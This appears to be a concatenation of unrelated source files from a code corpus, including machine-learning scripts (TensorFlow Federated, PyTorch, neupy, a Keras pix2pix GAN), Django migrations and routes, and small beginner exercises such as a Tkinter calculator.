print "Error(Z3Query)"
sys.exit(1)
try:
result=_s.check()
if sat==result:
print "Counter Example"
print _s.model()
elif unsat==result:
result
print "Successfully Proved"
else:
print "Failed To Prove"
except Exception as e:
print "Error(Z3Query)"
|
995,255 | 214fa7e6869280d6bb2d9e6d019d9db38aa3b2aa | # Copyright 2019, The TensorFlow Federated Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Libraries for the Shakespeare dataset for federated learning simulation."""
import collections
from typing import Optional
import tensorflow as tf
from tensorflow_federated.python.simulation.datasets import client_data
from tensorflow_federated.python.simulation.datasets import download
from tensorflow_federated.python.simulation.datasets import from_tensor_slices_client_data
from tensorflow_federated.python.simulation.datasets import sql_client_data
def _add_parsing(dataset: tf.data.Dataset) -> tf.data.Dataset:
def _parse_example_bytes(serialized_proto_tensor):
field_dict = {'snippets': tf.io.FixedLenFeature(shape=(), dtype=tf.string)}
parsed_fields = tf.io.parse_example(serialized_proto_tensor, field_dict)
return collections.OrderedDict(snippets=parsed_fields['snippets'])
return dataset.map(_parse_example_bytes, num_parallel_calls=tf.data.AUTOTUNE)
def load_data(
cache_dir: Optional[str] = None,
) -> tuple[client_data.ClientData, client_data.ClientData]:
"""Loads the federated Shakespeare dataset.
Downloads and caches the dataset locally. If previously downloaded, tries to
load the dataset from cache.
This dataset is derived from the Leaf repository
(https://github.com/TalwalkarLab/leaf) pre-processing on the works of
Shakespeare, which is published in "LEAF: A Benchmark for Federated Settings"
https://arxiv.org/abs/1812.01097.
The data set consists of 715 users (characters of Shakespeare plays), where
each
example corresponds to a contiguous set of lines spoken by the character in a
given play.
Data set sizes:
- train: 16,068 examples
- test: 2,356 examples
Rather than holding out specific users, each user's examples are split across
_train_ and _test_ so that all users have at least one example in _train_ and
one example in _test_. Characters that had less than 2 examples are excluded
from the data set.
The `tf.data.Datasets` returned by
`tff.simulation.datasets.ClientData.create_tf_dataset_for_client` will yield
`collections.OrderedDict` objects at each iteration, with the following keys
and values:
- `'snippets'`: a `tf.Tensor` with `dtype=tf.string`, the snippet of
contiguous text.
Args:
cache_dir: (Optional) directory to cache the downloaded file. If `None`,
caches in Keras' default cache directory.
Returns:
Tuple of (train, test) where the tuple elements are
`tff.simulation.datasets.ClientData` objects.
"""
database_path = download.get_compressed_file(
origin='https://storage.googleapis.com/tff-datasets-public/shakespeare.sqlite.lzma',
cache_dir=cache_dir,
)
train_client_data = sql_client_data.SqlClientData(
database_path, split_name='train'
).preprocess(_add_parsing)
test_client_data = sql_client_data.SqlClientData(
database_path, split_name='test'
).preprocess(_add_parsing)
return train_client_data, test_client_data
def get_synthetic() -> client_data.ClientData:
"""Creates `tff.simulation.datasets.ClientData` for a synthetic in-memory example of Shakespeare.
The returned `tff.simulation.datasets.ClientData` will have the same data
schema as `load_data()`, but uses a very small set of client data loaded
in-memory.
This synthetic data is useful for validation in small tests.
Returns:
A `tff.simulation.datasets.ClientData` of synthentic Shakespeare text.
"""
return from_tensor_slices_client_data.TestClientData(
_SYNTHETIC_SHAKESPEARE_DATA
)
# A small sub-sample of snippets from the Shakespeare dataset.
_SYNTHETIC_SHAKESPEARE_DATA = {
'THE_TRAGEDY_OF_KING_LEAR_MACBETH': collections.OrderedDict(
snippets=[
b'Hark!',
b'When?',
b"My name's Macbeth.",
b"'Twas a rough fight.",
b'Came they not by you?',
b'No, nor more fearful.',
]
),
'MUCH_ADO_ABOUT_NOTHING_EMILIA': collections.OrderedDict(
snippets=[
b'Never.',
b'But now, my lord.',
b'How if fair and foolish?',
b'Is not this man jealous?',
b'Why, with my lord, madam.',
b'[Within.] I do beseech you',
]
),
'THE_TAMING_OF_THE_SHREW_CUPID': collections.OrderedDict(
snippets=[
b'Hail to thee, worthy Timon, and to all',
]
),
}
|
995,256 | ab1e219df44fd1e70e7ebafd171722b60b57c999 | # Generated by Django 3.2.4 on 2021-06-16 09:39
import django.db.models.deletion
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='crop',
fields=[
('crop_id', models.IntegerField(primary_key=True, serialize=False)),
('crop_name', models.CharField(max_length=40)),
('organic', models.BooleanField(default=False)),
('quality', models.CharField(max_length=5)),
('price_Kg', models.FloatField(default=0)),
],
),
migrations.CreateModel(
name='storage',
fields=[
('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('store_id', models.IntegerField()),
('allocated_space', models.FloatField()),
('used_space', models.FloatField()),
('available_space', models.FloatField()),
('pincode', models.IntegerField()),
('crop', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='inventory.crop')),
],
),
]
|
995,257 | cfe652544d5b776725be43b10cf987aef73f91c6 | alt = float(input('Digite a altura das paredes da sala, em metros: '))
compr = float(input('Digite o comprimento da sala, em metros: '))
larg = float(input('Digite a largura da sala, em metros: '))
print(f'A รกrea do piso รฉ de {compr * larg:.2f} metros quadrados.')
print(f'O volume รฉ de {alt * compr * larg:.2f} metros cรบbicos.')
print(f'A รกrea das paredes รฉ de {2 * alt * larg + 2 * alt * compr} metros quadrados.')
|
995,258 | 760ce6e88071259d82894c7cf21564d64a372ccc | from django.contrib.auth.decorators import login_required
from django.views.generic import TemplateView
from django.views.generic.base import RedirectView
from django.conf.urls import url
urlpatterns = [
url(r'^$', RedirectView.as_view(url='dashboard'), name='home'),
url(r'^dashboard',
login_required(TemplateView.as_view(template_name="dashboard.html")), name='dashboard'),
url(r'^indices', TemplateView.as_view(template_name="indices.html")),
url(r'^shopping',
login_required(TemplateView.as_view(template_name="shopping.html")), name='shopping'),
url(r'^stats', TemplateView.as_view(template_name="stats.html")),
url(r'^private', login_required(TemplateView.as_view(template_name="indices.html"))),
url(r'^login$', TemplateView.as_view(template_name="login.html"), name='login'),
]
|
995,259 | 33a253ca2f7f19c3f653e1ad5cff59f92ea83eef | from pyner.named_entity.dataset import converter
from pyner.named_entity.dataset import DatasetTransformer
from pyner.named_entity.dataset import SequenceLabelingDataset
from pyner.named_entity.recognizer import BiLSTM_CRF
from pyner.vocab import Vocabulary
from pyner.util import parse_inference_args
from pyner.util import select_snapshot
from pyner.util import set_seed
import chainer.iterators as It
import chainer
import pathlib
import logging
import json
if __name__ == '__main__':
logger = logging.getLogger(__name__)
fmt = '%(asctime)s : %(threadName)s : %(levelname)s : %(message)s'
logging.basicConfig(level=logging.DEBUG, format=fmt)
args = parse_inference_args()
chainer.config.train = False
if args.device >= 0:
chainer.cuda.get_device(args.device).use()
set_seed()
model_dir = pathlib.Path(args.model)
params = json.load(open(model_dir / 'args'))
vocab = Vocabulary.prepare(params)
metric = args.metric.replace('/', '.')
snapshot_file, prediction_path = select_snapshot(args, model_dir)
logger.debug(f'creat prediction into {prediction_path}')
model = BiLSTM_CRF(params, vocab.dictionaries['word2idx'])
model_path = model_dir / snapshot_file
logger.debug(f'load {snapshot_file}')
chainer.serializers.load_npz(model_path.as_posix(), model)
if args.device >= 0:
model.to_gpu(args.device)
logger.debug('*** parameters ***')
for key, value in params.items():
logger.debug(f'{key}: {value}')
transformer = DatasetTransformer(vocab)
transform = transformer.transform
test_dataset = SequenceLabelingDataset(vocab, params, 'test', transform)
test_iterator = It.SerialIterator(test_dataset,
batch_size=len(test_dataset),
shuffle=False,
repeat=False)
with open(prediction_path, 'w', encoding='utf-8') as file:
for batch in test_iterator:
in_arrays, t_arrays = converter(batch, args.device)
p_arrays = model.predict(in_arrays)
word_sentences, t_tag_sentences = list(zip(*transformer.itransform(
in_arrays[0], t_arrays)))
_, p_tag_sentences = list(zip(*transformer.itransform(
in_arrays[0], p_arrays)))
sentence_gen = zip(word_sentences, t_tag_sentences, p_tag_sentences) # NOQA
for ws, ts, ps in sentence_gen:
for w, t, p in zip(ws, ts, ps):
print(f'{w} {t} {p}', file=file)
print(file=file)
|
995,260 | 3f4a23fb6d1fd96a1dcd3b114d3c36a7e117bf77 | """
Multi-layer Perceptron for Newsgroup data set
"""
import os
import sys
import pandas as pd
import numpy as np
import random
import csv
import matplotlib.pyplot as plt
from sklearn.preprocessing import OneHotEncoder
import torch
from torch import nn
from torch.autograd import Variable
import torch.utils.data as data_utils
from util import load_newsgroups, load_propernames
class MLP:
def __init__ (self, activate_function, epochs, batch_size, learning_rate, momentum, weight_decay):
self.epochs = epochs
self.batch_size = batch_size
self.learning_rate = learning_rate
self.momentum = momentum
self.weight_decay = weight_decay
self.model = None
self.onehot_encoder = None
self.onehot_columns = None
self.activate_function = activate_function
self.loss_history_train = []
pass
def fit(self, x_train, y_train):
self.onehot_encoder = OneHotEncoder(sparse=False,handle_unknown='ignore')
self.onehot_encoder.fit(y_train.values)
y_train_onehot = self.onehot_encoder.transform(y_train.values)
self.onehot_columns = y_train_onehot.shape[1]
x_train_tensor = torch.tensor(x_train.values).float()
y_train_tensor = torch.tensor(y_train_onehot).float()
train_data_torch = data_utils.TensorDataset(x_train_tensor, y_train_tensor)
train_loader = data_utils.DataLoader(train_data_torch, batch_size=self.batch_size, shuffle=True)
self.model = nn.Sequential(
nn.Linear(x_train_tensor.shape[1],200,bias=True),
#nn.ReLU(),
#nn.Sigmoid(),
#nn.Tanh(),
self.activate_function,
nn.Linear(200,self.onehot_columns,bias=True),
nn.Softmax(dim=1)
)
print('model',self.model)
loss_function = nn.BCELoss()
optimizer = torch.optim.SGD(self.model.parameters(), lr=self.learning_rate, momentum=self.momentum, weight_decay=self.weight_decay)
for i in range(self.epochs):
loss_total_train = 0
j = 0
for input, target in train_loader:
j +=1
# Forward Propagation
y_pred = self.model(input)
# Compute and print loss
loss_train = loss_function(y_pred, target)
loss_total_train += loss_train.item()
# Zero the gradients
optimizer.zero_grad()
# perform a backward pass (backpropagation)
loss_train.backward()
# Update the parameters
optimizer.step()
lose_avg_train = float(loss_total_train)/j
self.loss_history_train.append(lose_avg_train)
print('epoch:', i,' loss:', lose_avg_train)
return
def plot_loss(self):
plt.figure(1)
plt.plot(range(self.epochs),self.loss_history_train)
plt.title('Loss over epoch')
plt.xlabel('epoch')
plt.ylabel('loss')
plt.show()
def predict(self, x_test):
x_test_tensor = torch.tensor(x_test.values).float()
prediction_test = self.model(x_test_tensor)
prediction_test = torch.max(prediction_test,1)[1]
prediction_test = prediction_test.numpy()
prediction_test_onehot = np.zeros((prediction_test.size, self.onehot_columns))
prediction_test_onehot[np.arange(prediction_test.size),prediction_test] = 1
y_pred_test = self.onehot_encoder.inverse_transform(prediction_test_onehot)
return y_pred_test
def accuracy(y_dev, y_pred):
y_dev = np.array(y_dev)
y_pred = np.array(y_pred)
return sum(y_pred==y_dev)/len(y_dev)
#Load data
print("Loading data...")
train_bow, train_labels, dev_bow, dev_labels, test_bow = load_newsgroups()
x_train = pd.DataFrame(train_bow)
y_train = pd.DataFrame(train_labels)
x_dev = pd.DataFrame(dev_bow)
y_dev = pd.DataFrame(dev_labels)
x_test = pd.DataFrame(test_bow)
#Train model
#activate_func = nn.ReLU()
#activate_func = nn.Sigmoid()
activate_func = nn.Tanh()
mlp = MLP(activate_function=activate_func, epochs=1000, batch_size=10000, learning_rate=0.1, momentum=0.9, weight_decay=0)
mlp.fit(x_train, y_train)
#mlp.plot_loss()
#Prediction on Dev data
y_pred = mlp.predict(x_dev)
print('Accuracy:',accuracy(y_dev, y_pred))
y_pred = pd.DataFrame(y_pred).reset_index()
pd.DataFrame(y_pred).to_csv(index=False, header=['id','newsgroup'], path_or_buf="./data/newsgroups/dev/dev_pred_mlp.csv")
#Prediction on Test data
y_pred_test = mlp.predict(x_test)
y_pred_test = pd.DataFrame(y_pred_test).reset_index()
pd.DataFrame(y_pred_test).to_csv(index=False, header=['id','newsgroup'], path_or_buf="./results/mlp_newsgroup_test_predictions.csv")
|
995,261 | 986d147b65f523e399317cff7b599fc31f8059b1 | #[on_true] if [expression] else [on_false]
def Factorial(inp):
return 1 if inp == 0 else inp*Factorial(inp-1)
print(Factorial(5))
|
995,262 | 6237913ba8c0e6bd8f1ff6f729902f0befb6e695 | print('====== DESAFIO 66 ======')
cont = 0
soma = 0
while True:
valor = int(input('Digite um valor: '))
if valor == 999:
break
cont += 1
soma += valor
print(f'A quantidade de nรบmeros digitados foi: {cont}')
print(f'A soma de todos os valores รฉ: {soma}') |
995,263 | a632f016e1c97e630c09b1a869128c0cea79af37 | # Generated by Django 2.2.5 on 2021-03-14 13:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('poem', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Theme',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('theme', models.CharField(max_length=10)),
],
),
migrations.CreateModel(
name='Usr',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('username', models.CharField(max_length=12, unique=True)),
('password', models.CharField(max_length=12)),
('nickname', models.CharField(max_length=12)),
('email', models.EmailField(blank=True, max_length=254, unique=True)),
('icon', models.ImageField(upload_to='')),
],
),
migrations.AddField(
model_name='author',
name='dynasty',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='poem.Dynasty'),
),
migrations.AddField(
model_name='poem',
name='theme',
field=models.ManyToManyField(blank=True, to='poem.Theme'),
),
]
|
995,264 | 5bb5efd248d672161310fa2b22409ff05b9f6bda | # Import the Tkinter module
from tkinter import *
# Initialize the window
root = Tk()
# Create the title
root.title("Simple Calculator")
# Create and size the entry window
e = Entry(root,width=30,borderwidth=5)
e.grid(row=0,columnspan=3)
def button_click(number):
'''This function makes it possible for the Entry screen to properly display the
proper number in the order that it was entered'''
current = e.get()
e.delete(0,END)
e.insert(0,str(current) + str(number))
def button_clear():
'''This function will run whenever the C button is clicked and
it will delete whatever is the in Entry window'''
e.delete(0,END)
def button_add():
'''This function will retrieve whatever is in the Entry window, store
it in the first_number variable , then it defines the global variable
f_num so we are able to grab the f_num from another function, then the function
assigns the number we grabbed from the Entry window to the global variable and deletes
anything in the box to get ready for the next input number'''
first_number = e.get()
global f_num
global math
math = "addition"
f_num = int(first_number)
e.delete(0,END)
def button_subtract():
first_number = e.get()
global f_num
global math
math = "subtraction"
f_num = int(first_number)
e.delete(0,END)
def button_multiply():
first_number = e.get()
global f_num
global math
math = "multiplication"
f_num = int(first_number)
e.delete(0,END)
def button_divide():
first_number = e.get()
global f_num
global math
math = "division"
f_num = int(first_number)
e.delete(0,END)
def button_equal():
'''This function grabs the second number that is typed into the Entry window
and then deletes the second number to make room for the answer to be inserted into the
Entry window'''
second_number = e.get()
e.delete(0,END)
if math == "addition":
e.insert(0,f_num + int(second_number))
elif math == "subtraction":
e.insert(0,f_num - int(second_number))
elif math == "multiplication":
e.insert(0,f_num * int(second_number))
elif math == "division":
e.insert(0,f_num // int(second_number))
number0 = Button(root,text="0",padx=40,pady=20,command=lambda: button_click(0)).grid(row=4,column=0)
number1 = Button(root,text="1",padx=40,pady=20,command=lambda: button_click(1)).grid(row=3,column=2)
number2 = Button(root,text="2",padx=40,pady=20,command=lambda: button_click(2)).grid(row=3,column=1)
number3 = Button(root,text="3",padx=40,pady=20,command=lambda: button_click(3)).grid(row=3,column=0)
number4 = Button(root,text="4",padx=40,pady=20,command=lambda: button_click(4)).grid(row=2,column=2)
number5 = Button(root,text="5",padx=40,pady=20,command=lambda: button_click(5)).grid(row=2,column=1)
number6 = Button(root,text="6",padx=40,pady=20,command=lambda: button_click(6)).grid(row=2,column=0)
number7 = Button(root,text="7",padx=40,pady=20,command=lambda: button_click(7)).grid(row=1,column=2)
number8 = Button(root,text="8",padx=40,pady=20,command=lambda: button_click(8)).grid(row=1,column=1)
number9 = Button(root,text="9",padx=40,pady=20,command=lambda: button_click(9)).grid(row=1,column=0)
add_button = Button(root,text="+",padx=40,pady=20,command=button_add).grid(row=5,column=0)
multiply_button = Button(root,text="*",padx=40,pady=20,command=button_multiply).grid(row=6,column=0)
divide_button = Button(root,text="/",padx=40,pady=20,command=button_divide).grid(row=6,column=1)
subtract_button = Button(root,text="-",padx=40,pady=20,command=button_subtract).grid(row=5,column=1)
equal_button = Button(root,text="=",padx=40,pady=20,command=button_equal).grid(row=7,column=1)
clear_screen_button = Button(root,text="C",padx=40,pady=20,command=button_clear).grid(row=7,column=0)
root.mainloop()
|
995,265 | f10de17267f1744e2127e74fb30a1ecd6e0bf5ac | import numpy as np
from neupy.core.properties import NumberProperty
from .backpropagation import Backpropagation
__all__ = ('MinibatchGradientDescent',)
class MinibatchGradientDescent(Backpropagation):
""" Mini-batch Gradient Descent algorithm.
Parameters
----------
batch_size : int
Setup batch size for learning process, defaults to ``10``.
{optimizations}
{full_params}
Methods
-------
{supervised_train}
{raw_predict}
{full_methods}
Examples
--------
>>> import numpy as np
>>> from neupy import algorithms
>>>
>>> x_train = np.array([[1, 2], [3, 4]])
>>> y_train = np.array([[1], [0]])
>>>
>>> mgdnet = algorithms.MinibatchGradientDescent(
... (2, 3, 1),
... verbose=False,
... batch_size=1
... )
>>> mgdnet.train(x_train, y_train)
See Also
--------
:network:`Backpropagation` : Backpropagation algorithm.
"""
batch_size = NumberProperty(default=10)
def iter_batches(self, input_train, target_train):
count_of_data = input_train.shape[0]
for i in range(0, count_of_data, self.batch_size):
batch = slice(i, i + self.batch_size)
yield input_train[batch], target_train[batch]
def train_batch(self, input_data, target_data):
deltas = [np.zeros(l.weight.shape) for l in self.train_layers]
raw_predict = self.raw_predict
get_gradient = self.get_gradient
for input_row, target_row in zip(input_data, target_data):
output_train = raw_predict(input_data)
self.output_train = output_train
weight_delta = get_gradient(output_train, target_data)
deltas = map(sum, zip(deltas, weight_delta))
self.weight_delta = [-delta / len(input_data) for delta in deltas]
return self.weight_delta
def train_epoch(self, input_train, target_train):
batches = self.iter_batches(input_train, target_train)
train_batch = self.train_batch
update_weights = self.update_weights
after_weight_update = self.after_weight_update
for input_data, target_data in batches:
weight_delta = train_batch(input_data, target_data)
update_weights(weight_delta)
after_weight_update(input_train, target_train)
return self.error(self.raw_predict(input_train), target_train)
|
995,266 | 2694d8d3f1709dd8686c1f9c045c5eca240c41c0 | version https://git-lfs.github.com/spec/v1
oid sha256:3c44e7225014a288ee2f1fdd1282b4a45f8baa0fa8200cdb5d51759d93a4e5dd
size 126
|
995,267 | e4dd478a75553155b42bec914abe1976b091806e | # ๅฐ่ฐทๆญๅฐๅพ่ฝฌๆขไธบๅซๆๅพ
from numpy import load
from numpy import zeros
from numpy import ones
from numpy.random import randint
from keras.optimizers import Adam
from keras.initializers import RandomNormal
from keras.models import Model
from keras.models import Input
from keras.layers import Conv2D
from keras.layers import Conv2DTranspose
from keras.layers import Activation
from keras.layers import Concatenate
from keras.layers import Dropout
from keras.layers import BatchNormalization
from keras.layers import LeakyReLU
from keras.models import load_model
from matplotlib import pyplot
# ๅฎไนๅคๅซๅจๆจกๅ
# 70x70 Patch GAN
def define_discriminator(image_shape):
# ๆ้ๅๅงๅ
init = RandomNormal(stddev=0.02)
# ๆบๅพๅ่พๅ
ฅ
in_src_image = Input(shape=image_shape)
# ็ฎๆ ๅพๅ่พๅ
ฅ
in_target_image = Input(shape=image_shape)
# ๅฐๅพๅๅจ้้ๅฐบๅบฆไธ่ฟๆฅ
merged = Concatenate()([in_src_image, in_target_image])
# C64
d = Conv2D(64, (4,4), strides=(2,2), padding='same', kernel_initializer=init)(merged)
d = LeakyReLU(alpha=0.2)(d)
# C128
d = Conv2D(128, (4,4), strides=(2,2), padding='same', kernel_initializer=init)(d)
d = BatchNormalization()(d)
d = LeakyReLU(alpha=0.2)(d)
# C256
d = Conv2D(256, (4,4), strides=(2,2), padding='same', kernel_initializer=init)(d)
d = BatchNormalization()(d)
d = LeakyReLU(alpha=0.2)(d)
# C512
d = Conv2D(512, (4,4), strides=(2,2), padding='same', kernel_initializer=init)(d)
d = BatchNormalization()(d)
d = LeakyReLU(alpha=0.2)(d)
# ๅๆฐ็ฌฌไบไธช่พๅบๅฑ
d = Conv2D(512, (4,4), padding='same', kernel_initializer=init)(d)
d = BatchNormalization()(d)
d = LeakyReLU(alpha=0.2)(d)
# patch่พๅบ
d = Conv2D(1, (4,4), padding='same', kernel_initializer=init)(d)
patch_out = Activation('sigmoid')(d)
# ๅฎไนๆจกๅ
model = Model([in_src_image, in_target_image], patch_out)
# ็ผ่ฏๆจกๅ
opt = Adam(lr=0.0002, beta_1=0.5)
model.compile(loss='binary_crossentropy', optimizer=opt, loss_weights=[0.5])
return model
# ๅฎไน็ผ็ ๅจๆจกๅ
def define_encoder_block(layer_in, n_filters, batchnorm=True):
# ๆ้ๅๅงๅ
init = RandomNormal(stddev=0.02)
# ๆทปๅ ไธ้ๆ ทๅฑ
g = Conv2D(n_filters, (4,4), strides=(2,2), padding='same', kernel_initializer=init)(layer_in)
# ๆ นๆฎๆกไปถๅณๅฎๆฏๅฆๆทปๅ ๆนๆญฃๅๅ
if batchnorm:
g = BatchNormalization()(g, training=True)
# leaky reluๆฟๆดป
g = LeakyReLU(alpha=0.2)(g)
return g
# ๅฎไน่งฃ็ ๅจๆจกๅ
def decoder_block(layer_in, skip_in, n_filters, dropout=True):
# ๆ้ๆญฃๅๅ
init = RandomNormal(stddev=0.02)
# ๆทปๅ ไธ้ๆ ทๅฑ
g = Conv2DTranspose(n_filters, (4,4), strides=(2,2), padding='same', kernel_initializer=init)(layer_in)
# ๆทปๅ ๆนๆญฃๅๅ
g = BatchNormalization()(g, training=True)
# ๆ นๆฎๆกไปถๅณๅฎๆฏๅฆๆทปๅ dropout
if dropout:
g = Dropout(0.5)(g, training=True)
# ๆทปๅ ่ทณ่ท่ฟๆฅ
g = Concatenate()([g, skip_in])
# reluๆฟๆดป
g = Activation('relu')(g)
return g
# ๅฎไน็ฌ็ซ็็ๆๅจๆจกๅ
def define_generator(image_shape=(256,256,3)):
# ๆ้ๅๅงๅ
init = RandomNormal(stddev=0.02)
# ่พๅ
ฅๅพๅ
in_image = Input(shape=image_shape)
# ็ผ็ ๅจๆจกๅ
e1 = define_encoder_block(in_image, 64, batchnorm=False)
e2 = define_encoder_block(e1, 128)
e3 = define_encoder_block(e2, 256)
e4 = define_encoder_block(e3, 512)
e5 = define_encoder_block(e4, 512)
e6 = define_encoder_block(e5, 512)
e7 = define_encoder_block(e6, 512)
# ็ถ้ขๅฑ๏ผๆฒกๆๆนๆญฃๅๅๅreluๆฟๆดป
b = Conv2D(512, (4,4), strides=(2,2), padding='same', kernel_initializer=init)(e7)
b = Activation('relu')(b)
# ่งฃ็ ๅจๆจกๅ
d1 = decoder_block(b, e7, 512)
d2 = decoder_block(d1, e6, 512)
d3 = decoder_block(d2, e5, 512)
d4 = decoder_block(d3, e4, 512, dropout=False)
d5 = decoder_block(d4, e3, 256, dropout=False)
d6 = decoder_block(d5, e2, 128, dropout=False)
d7 = decoder_block(d6, e1, 64, dropout=False)
# ่พๅบ
g = Conv2DTranspose(3, (4,4), strides=(2,2), padding='same', kernel_initializer=init)(d7)
out_image = Activation('tanh')(g)
# ๅฎไนๆจกๅ
model = Model(in_image, out_image)
return model
# ๅฎไนๅคๅซๅจๅ็ๆๅจ็ๅคๅๆจกๅ๏ผ็จไบๆดๆฐ็ๆๅจ
def define_gan(g_model, d_model, image_shape):
# ๅป็ปๅคๅซๅจ็ๅๆฐ
for layer in d_model.layers:
if not isinstance(layer, BatchNormalization):
layer.trainable = False
# ๅฎไนๆบๅพๅ
in_src = Input(shape=image_shape)
# ๅฐๆบๅพๅไฝไธบ็ๆๅจ็่พๅ
ฅ
gen_out = g_model(in_src)
# ๅฐๆบๅพๅๅ็ๆๅจ็่พๅบไฝไธบๅคๅซๅจ็่พๅ
ฅ
dis_out = d_model([in_src, gen_out])
# ๅฐๆบๅพๅไฝไธบ่พๅ
ฅ๏ผ่พๅบ็ๆ็ๅพๅไปฅๅๅ็ฑป็ปๆ
model = Model(in_src, [dis_out, gen_out])
# ็ผ่ฏๆจกๅ
opt = Adam(lr=0.0002, beta_1=0.5)
model.compile(loss=['binary_crossentropy', 'mae'], optimizer=opt, loss_weights=[1,100])
return model
# ๅ ่ฝฝๅนถไธๅๅค็จไบ่ฎญ็ป็ๅพๅ
def load_real_samples(filename):
# ๅ ่ฝฝๅ็ผฉ็ๆฐ็ป
data = load(filename)
# ๅฐๆฐ็ปๆไธบไธค้จๅ๏ผไนๅณๅฏนๅบๆบๅพๅๅ็ฎๆ ๅพๅ
X1, X2 = data['arr_0'], data['arr_1']
# ๅฐๅฐบๅฏธ็ฑ[0,255]ๅไธบ[-1,1]๏ผไนๅณๅฝไธๅ
X1 = (X1 - 127.5) / 127.5
X2 = (X2 - 127.5) / 127.5
return [X1, X2]
# ไปๆ ทๆฌไธญ้ๆบ้ๆฉไธๆนๅพๅ๏ผ่ฟๅๅพๅๅฏนไปฅๅๅฏนๅบ็ๅ็ฑปๆ ็ญพ
def generate_real_samples(dataset, n_samples, patch_shape):
# ๅฐๆฐๆฎ้ๆๅ
trainA, trainB = dataset
# ้ๆบ้ๆฉๆ ทไพ
ix = randint(0, trainA.shape[0], n_samples)
# ๆขๅค้ๆฉ็ๅพๅ
X1, X2 = trainA[ix], trainB[ix]
# ็ๆ็ๅฎๅ็ฑป็ๆ ็ญพ๏ผ1๏ผ
y = ones((n_samples, patch_shape, patch_shape, 1))
return [X1, X2], y
# ็ๆไธๆนๅพๅๅนถไธ่ฟๅๅพๅๅๅฏนๅบๅ็ฑปๆ ็ญพ
def generate_fake_samples(g_model, samples, patch_shape):
# ็ๆ๏ผๅ๏ผๅพๅ
X = g_model.predict(samples)
# ็ๆโๅโๅ็ฑปๆ ็ญพ๏ผ0๏ผ
y = zeros((len(X), patch_shape, patch_shape, 1))
return X, y
# ็ๆๆ ทไพๅนถไธไฟๅญไธบplotๅพ็ๅฝขๅผ๏ผๅๆถไฟๅญๆจกๅ
def summarize_performance(step, g_model, dataset, n_samples=3):
# ้ๆฉไธไธช่พๅ
ฅๅพๅ็ๅฎไพ
[X_realA, X_realB], _ = generate_real_samples(dataset, n_samples, 1)
# ็ๆไธๆนๅๆ ทๅ
X_fakeB, _ = generate_fake_samples(g_model, X_realA, 1)
# ๅฐๆๆๅ็ด ๅผ่ๅดไป[-1,1]ๅไธบ[0,1]
X_realA = (X_realA + 1) / 2.0
X_realB = (X_realB + 1) / 2.0
X_fakeB = (X_fakeB + 1) / 2.0
# ็ปๅถ็ๅฎ็ๆบๅพๅ
for i in range(n_samples):
pyplot.subplot(3, n_samples, 1 + i)
pyplot.axis('off')
pyplot.imshow(X_realA[i])
# ็ปๅถ็ๆ็็ฎๆ ๅพๅ
for i in range(n_samples):
pyplot.subplot(3, n_samples, 1 + n_samples + i)
pyplot.axis('off')
pyplot.imshow(X_fakeB[i])
# ็ปๅถ็ๅฎ็็ฎๆ ๅพๅ
for i in range(n_samples):
pyplot.subplot(3, n_samples, 1 + n_samples*2 + i)
pyplot.axis('off')
pyplot.imshow(X_realB[i])
# ๅฐ็ปๅถ็ๅพไฟๅญๅฐๆไปถ
filename1 = '70x70_model/new_plot_%06d.png' % (step+1)
pyplot.savefig(filename1)
pyplot.close()
# ไฟๅญ็ๆๅจๆจกๅ
filename2 = '70x70_model/new_g_model_%06d.h5' % (step+1)
g_model.save(filename2)
# d_model.save(filename3)
print('>Saved: %s and %s' % (filename1, filename2))
# ่ฎญ็ปpix2pixๆจกๅ
def train(d_model, g_model, gan_model, dataset, n_epochs=100, n_batch=1):
# ็กฎๅฎๅคๅซๅจ่พๅบ็ๆนๅฝขๅฝข็ถ
n_patch = d_model.output_shape[1]
# ๆๅๆฐๆฎ้
trainA, trainB = dataset
# ่ฎก็ฎๆฏไธไธช่ฎญ็ป่ฝฎๆฌก็ๅพๅๆนๆฐ
bat_per_epo = int(len(trainA) / n_batch)
# ่ฎก็ฎ่ฎญ็ป็่ฟญไปฃๆฌกๆฐ
n_steps = bat_per_epo * n_epochs
# ไธๅ็่ฎญ็ป่ฝฎๆฌก
for i in range(n_steps):
# ้ๆฉไธๆน็ๅฎ็ๆ ทไพ
[X_realA, X_realB], y_real = generate_real_samples(dataset, n_batch, n_patch)
# ็ๆไธๆน่ๅ็ๆ ทไพ
X_fakeB, y_fake = generate_fake_samples(g_model, X_realA, n_patch)
# ๅฉ็จ็ๅฎๆ ทไพๆฅๆดๆฐๅคๅซๅจ
d_loss1 = d_model.train_on_batch([X_realA, X_realB], y_real)
# ๅฉ็จ็ๆๆ ทไพๆฅๆดๆฐๅคๅซๅจ
d_loss2 = d_model.train_on_batch([X_realA, X_fakeB], y_fake)
# ๆดๆฐ็ๆๅจ
g_loss, _, _ = gan_model.train_on_batch(X_realA, [y_real, X_realB])
# ๆป็ปๆง่ฝ
print('>%d, d1[%.3f] d2[%.3f] g[%.3f]' % (i+1, d_loss1, d_loss2, g_loss))
# ๆป็ปๆจกๅ็ๆง่ฝ
if (i+1) % (bat_per_epo * 10) == 0:
summarize_performance(i, g_model, dataset)
# ๅ ่ฝฝๅพๅๆฐๆฎ
dataset = load_real_samples('data/maps_train_256.npz')
print('Loaded', dataset[0].shape, dataset[1].shape)
# ๅบไบๅ ่ฝฝ็ๆฐๆฎ้ๆฅๅฎไน่พๅ
ฅ็ๅฝข็ถ
image_shape = dataset[0].shape[1:]
# ๅฎไนๆจกๅ
load_from_checkpoint = False
d_model_file = "d_modle_010960.h5"
g_model_file = "g_modle_010960.h5"
if load_from_checkpoint:
d_model = load_model(d_model_file)
